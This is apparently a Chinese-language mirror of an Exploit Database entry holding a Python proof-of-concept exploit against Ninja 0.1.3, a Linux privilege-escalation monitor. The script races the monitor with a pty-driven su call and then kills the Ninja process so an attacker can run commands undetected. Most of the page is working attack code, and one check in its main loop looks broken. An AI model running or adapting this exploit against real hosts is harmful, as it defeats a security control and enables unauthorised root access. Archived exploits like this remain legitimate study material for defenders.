Ninja Privilege Escalation Detection and Prevention System 0.1.3 – Race Condition Privilege Escalation

• Exploit Database
• 31 阅读

• 作者： Ben Sheppard
  日期： 2015-04-29
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/36855/

• #[Title] Ninja privilege escalation detection and prevention system race condition
  #[Author] Ben 'highjack' Sheppard
  #[URL] http://highjack.github.io/
  #[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
  #It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
  #The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
  #[Software Link] http://forkbomb.org/ninja/
  #[Date] 29/04/2015
  #[Version] 0.1.3
  #[Tested on] Kali Linux
  #[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
  
  #See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
  #https://www.youtube.com/watch?v=eA136fOsSeQ
  
  import pty, os, sys, subprocess
  pid, fd = pty.fork()
  
  #begin config
  user = "root"
  password= "mypassword" #change this :)
  command = "killall -9 ninja"
  #end config
  
  
  def usage():
  	print """
  @@@@@@@@@ @@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@
  @@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@
  @@!@@@@@!!@@@@!@@@ @@!@@!@@@!@@ @@!!@@
  !@!@!@!@!!@!!@!@!@ !@!!@!@!@!@! !@!@!!
  @!@!@!@!!!@!@! @!@!@@!@!@!@! !!@@!@!@!@!!@! @!@@!@! 
  !!!@!!!!!!!!!! !!@!!!!!@!!!! !!!!!!@!!!!!!! !!@!!!
  !!:!!!!!::!! !!:!!:!!! !!:!!:!!!:!! !!: :!! 
  :!:!:!:!::!: !:::!:!:!!!::!::!:!:!:!: :!:!:!
  :: ::: :: ::: :::::: :::::: : :::: ::: ::: ::: :::::
   : : :: :: :: :: : : : ::: : : : :: :: : : ::: 
   
  [Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
  [Author] Ben 'highjack' Sheppard
  [URL] http://highjack.github.io/
   
  [Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
  It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
  The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
   """
   
  
  executions = 0
  def check_procs():
  	p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
  	p2 = subprocess.Popen(["grep", "root"],stdin=p1.stdout,stdout=subprocess.PIPE)
  	p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
  	output = p3.communicate()[0]
  	if output != "":
  		if executions != 0:
  			sys.exit(0)
  		return True
  	else:
  		return False
  
  def kill_ninja():
  	if pid == 0:
  		os.execvp("su", ["su", user, "-c", command])
  	elif pid > 0:
  		try:
  			os.read(fd, 1024)
  			os.write(fd, password + "\n")
  			os.read(fd,1024)
  			os.wait()
  			os.close(fd)
  		except:
  			usage()
  			print "[+] Ninja is terminated"
  			sys.exit(0)
  			
  
  while True:
  	kill_ninja()
  	if (check_procs == True):
  		executions = executions + 1
  		kill_ninja()